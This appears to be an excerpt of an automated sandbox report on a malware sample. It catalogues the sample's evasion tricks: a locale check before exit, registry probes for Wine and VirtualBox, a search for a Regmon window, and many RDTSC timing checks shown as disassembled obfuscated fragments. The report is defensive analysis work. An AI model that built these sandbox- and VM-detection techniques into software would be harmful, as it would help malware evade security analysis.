                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007C9BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_007C9BB0

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-37512
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9D9EC second address: A9D9F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1114F second address: C1115F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41CC2F0CAh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1115F second address: C1116F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41CDAB66Bh 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C114FF second address: C11503 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C11503 second address: C1150F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FC41CDAB666h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1150F second address: C11514 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C11514 second address: C11545 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007FC41CDAB671h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC41CDAB675h 0x00000013 push edx 0x00000014 pop edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C13F20 second address: A9D9EC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 xor dword ptr [esp], 7964451Eh 0x0000000d jne 00007FC41CC2F0CCh 0x00000013 push dword ptr [ebp+122D1189h] 0x00000019 jmp 00007FC41CC2F0CBh 0x0000001e call dword ptr [ebp+122D3071h] 0x00000024 pushad 0x00000025 jmp 00007FC41CC2F0D0h 0x0000002a xor eax, eax 0x0000002c jmp 00007FC41CC2F0CEh 0x00000031 mov edx, dword ptr [esp+28h] 0x00000035 pushad 0x00000036 jnl 00007FC41CC2F0DBh 0x0000003c call 00007FC41CC2F0CAh 0x00000041 mov edx, dword ptr [ebp+122D3712h] 0x00000047 pop eax 0x00000048 popad 0x00000049 mov dword ptr [ebp+122D36B2h], eax 0x0000004f jmp 00007FC41CC2F0CBh 0x00000054 mov esi, 0000003Ch 0x00000059 cld 0x0000005a add esi, dword ptr [esp+24h] 0x0000005e jmp 00007FC41CC2F0D0h 0x00000063 lodsw 0x00000065 mov dword ptr [ebp+122D18D1h], edi 0x0000006b add eax, dword ptr [esp+24h] 0x0000006f jbe 00007FC41CC2F0D8h 0x00000075 jmp 00007FC41CC2F0D2h 0x0000007a clc 0x0000007b mov ebx, dword ptr [esp+24h] 0x0000007f pushad 0x00000080 sub ebx, 48E15375h 0x00000086 popad 0x00000087 nop 0x00000088 jo 00007FC41CC2F0E1h 0x0000008e push eax 0x0000008f push edx 0x00000090 push eax 0x00000091 push edx 0x00000092 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C13F91 second address: C1403F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41CDAB66Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007FC41CDAB668h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 00000015h 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 mov dx, 86A3h 0x00000028 push ecx 0x00000029 mov edx, dword ptr [ebp+122D3672h] 0x0000002f pop edx 0x00000030 push 00000000h 0x00000032 mov edi, 3742FAFAh 0x00000037 push 92B4125Fh 0x0000003c jp 00007FC41CDAB66Eh 0x00000042 add dword ptr [esp], 6D4BEE21h 0x00000049 clc 0x0000004a push 00000003h 0x0000004c mov dword ptr [ebp+122D182Ah], esi 0x00000052 push 00000000h 0x00000054 push 00000000h 0x00000056 push esi 0x00000057 call 00007FC41CDAB668h 0x0000005c pop esi 0x0000005d mov dword ptr [esp+04h], esi 0x00000061 add dword ptr [esp+04h], 00000019h 0x00000069 inc esi 0x0000006a push esi 0x0000006b ret 0x0000006c pop esi 0x0000006d ret 0x0000006e push 00000003h 0x00000070 jne 00007FC41CDAB66Ah 0x00000076 push 40EB9056h 0x0000007b pushad 0x0000007c je 00007FC41CDAB66Ch 0x00000082 js 00007FC41CDAB666h 0x00000088 jng 00007FC41CDAB66Ch 0x0000008e push eax 0x0000008f push edx 0x00000090 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1411D second address: C14122 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C14122 second address: C14128 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C14128 second address: C1412C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1412C second address: C14169 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a push esi 0x0000000b push edx 0x0000000c pop edx 0x0000000d pop esi 0x0000000e pop ebx 0x0000000f nop 0x00000010 mov dword ptr [ebp+122D30A2h], esi 0x00000016 push 00000000h 0x00000018 or dword ptr [ebp+122D1806h], edx 0x0000001e push EB11832Bh 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 jmp 00007FC41CDAB674h 0x0000002b push eax 0x0000002c pop eax 0x0000002d popad 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C14169 second address: C1416E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1416E second address: C1420C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 add dword ptr [esp], 14EE7D55h 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007FC41CDAB668h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 00000017h 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 mov dx, 8124h 0x0000002c mov di, cx 0x0000002f push 00000003h 0x00000031 call 00007FC41CDAB66Bh 0x00000036 jmp 00007FC41CDAB679h 0x0000003b pop edx 0x0000003c push 00000000h 0x0000003e mov ecx, dword ptr [ebp+122D38B2h] 0x00000044 push 00000003h 0x00000046 sub esi, 364B837Bh 0x0000004c mov esi, dword ptr [ebp+122D38DEh] 0x00000052 call 00007FC41CDAB669h 0x00000057 push eax 0x00000058 push edx 0x00000059 pushad 0x0000005a jmp 00007FC41CDAB66Ch 0x0000005f jmp 00007FC41CDAB674h 0x00000064 popad 0x00000065 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1420C second address: C14243 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC41CC2F0CCh 0x00000008 jnl 00007FC41CC2F0C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 jmp 00007FC41CC2F0CCh 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a jnp 00007FC41CC2F0CEh 0x00000020 mov eax, dword ptr [eax] 0x00000022 push esi 0x00000023 pushad 0x00000024 push edi 0x00000025 pop edi 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C142FD second address: C14368 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC41CDAB666h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c pushad 0x0000000d jnl 00007FC41CDAB66Ch 0x00000013 pushad 0x00000014 jmp 00007FC41CDAB673h 0x00000019 jmp 00007FC41CDAB66Ah 0x0000001e popad 0x0000001f popad 0x00000020 nop 0x00000021 sub dword ptr [ebp+122D31CEh], edi 0x00000027 movsx edx, dx 0x0000002a push 00000000h 0x0000002c mov dh, cl 0x0000002e sub dword ptr [ebp+122D31CEh], ebx 0x00000034 push A43714A7h 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007FC41CDAB677h 0x00000040 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C14368 second address: C143D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FC41CC2F0C6h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e add dword ptr [esp], 5BC8EBD9h 0x00000015 jmp 00007FC41CC2F0CBh 0x0000001a mov dx, D77Bh 0x0000001e push 00000003h 0x00000020 mov ecx, 22D54512h 0x00000025 push 00000000h 0x00000027 jmp 00007FC41CC2F0D7h 0x0000002c mov cx, 34ADh 0x00000030 push 00000003h 0x00000032 call 00007FC41CC2F0D6h 0x00000037 mov edx, 5882B46Ah 0x0000003c pop ecx 0x0000003d push FF4C4FC9h 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 popad 0x00000048 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C143D9 second address: C143DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C143DF second address: C14452 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41CC2F0CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 3F4C4FC9h 0x00000010 push 00000000h 0x00000012 push ecx 0x00000013 call 00007FC41CC2F0C8h 0x00000018 pop ecx 0x00000019 mov dword ptr [esp+04h], ecx 0x0000001d add dword ptr [esp+04h], 0000001Ch 0x00000025 inc ecx 0x00000026 push ecx 0x00000027 ret 0x00000028 pop ecx 0x00000029 ret 0x0000002a lea ebx, dword ptr [ebp+12449E6Bh] 0x00000030 push 00000000h 0x00000032 push esi 0x00000033 call 00007FC41CC2F0C8h 0x00000038 pop esi 0x00000039 mov dword ptr [esp+04h], esi 0x0000003d add dword ptr [esp+04h], 00000014h 0x00000045 inc esi 0x00000046 push esi 0x00000047 ret 0x00000048 pop esi 0x00000049 ret 0x0000004a xchg eax, ebx 0x0000004b jmp 00007FC41CC2F0CBh 0x00000050 push eax 0x00000051 push eax 0x00000052 push edx 0x00000053 push esi 0x00000054 pushad 0x00000055 popad 0x00000056 pop esi 0x00000057 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C14452 second address: C1446E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC41CDAB678h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFA6D0 second address: BFA6D5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C324CB second address: C324EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41CDAB675h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3280A second address: C32840 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41CC2F0D6h 0x00000007 jmp 00007FC41CC2F0D7h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C32840 second address: C32859 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC41CDAB675h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C32859 second address: C32882 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41CC2F0D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC41CC2F0CAh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C32882 second address: C32886 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C32886 second address: C32892 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C32892 second address: C328A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnc 00007FC41CDAB66Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C32A29 second address: C32A2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C32A2D second address: C32A33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C32A33 second address: C32A41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007FC41CC2F0CCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C32A41 second address: C32A48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C32A48 second address: C32A4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C32F74 second address: C32F7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C32F7C second address: C32F87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FC41CC2F0C6h 0x0000000a pop esi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C33222 second address: C33228 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C28147 second address: C2815B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007FC41CC2F0CDh 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2815B second address: C28161 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C28161 second address: C28165 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C02B65 second address: C02B6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C02B6D second address: C02B7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FC41CC2F0C6h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C02B7B second address: C02B80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3337E second address: C33383 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C33383 second address: C33389 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C33389 second address: C3338F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3338F second address: C333A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FC41CDAB66Eh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C333A9 second address: C333AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C33AC9 second address: C33AE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FC41CDAB666h 0x0000000a jmp 00007FC41CDAB66Eh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C33AE1 second address: C33AEB instructions: 0x00000000 rdtsc 0x00000002 js 00007FC41CC2F0C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C33C24 second address: C33C34 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jng 00007FC41CDAB668h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C38396 second address: C3839D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3839D second address: C383C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jl 00007FC41CDAB666h 0x0000000f jmp 00007FC41CDAB677h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0B3DF second address: C0B3E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3BB6F second address: C3BB73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3BB73 second address: C3BBA9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41CC2F0D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007FC41CC2F0D2h 0x00000012 mov eax, dword ptr [eax] 0x00000014 push eax 0x00000015 push edx 0x00000016 jnc 00007FC41CC2F0C8h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3BBA9 second address: C3BBDA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41CDAB66Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007FC41CDAB678h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3BD18 second address: C3BD3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a pushad 0x0000000b jmp 00007FC41CC2F0D6h 0x00000010 pushad 0x00000011 push eax 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3F817 second address: C3F81D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C408F2 second address: C408FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FC41CC2F0C6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C40982 second address: C40988 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C40988 second address: C409BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnl 00007FC41CC2F0C6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 pushad 0x00000013 jne 00007FC41CC2F0CCh 0x00000019 jnc 00007FC41CC2F0CCh 0x0000001f popad 0x00000020 mov eax, dword ptr [eax] 0x00000022 push eax 0x00000023 push edx 0x00000024 push edi 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C409BB second address: C409C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C409C0 second address: C409E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41CC2F0D5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d jns 00007FC41CC2F0D4h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C409E7 second address: C40A1F instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC41CDAB666h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007FC41CDAB668h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 00000015h 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 cld 0x00000026 push 9CDFC551h 0x0000002b push eax 0x0000002c push edx 0x0000002d jp 00007FC41CDAB668h 0x00000033 pushad 0x00000034 popad 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C40B47 second address: C40B6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007FC41CC2F0D9h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C40DFE second address: C40E03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C40FCA second address: C40FD0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C41545 second address: C41578 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebx 0x0000000b movsx esi, ax 0x0000000e nop 0x0000000f jmp 00007FC41CDAB66Ch 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FC41CDAB675h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C41F99 second address: C4202B instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC41CC2F0CCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007FC41CC2F0C8h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 mov dword ptr [ebp+1245217Ah], edx 0x0000002d xor esi, dword ptr [ebp+122D31C4h] 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push esi 0x0000003a call 00007FC41CC2F0C8h 0x0000003f pop esi 0x00000040 mov dword ptr [esp+04h], esi 0x00000044 add dword ptr [esp+04h], 00000015h 0x0000004c inc esi 0x0000004d push esi 0x0000004e ret 0x0000004f pop esi 0x00000050 ret 0x00000051 jns 00007FC41CC2F0CCh 0x00000057 xchg eax, ebx 0x00000058 je 00007FC41CC2F0E0h 0x0000005e pushad 0x0000005f jmp 00007FC41CC2F0D2h 0x00000064 jl 00007FC41CC2F0C6h 0x0000006a popad 0x0000006b push eax 0x0000006c push esi 0x0000006d push eax 0x0000006e push edx 0x0000006f push ebx 0x00000070 pop ebx 0x00000071 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4202B second address: C4202F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
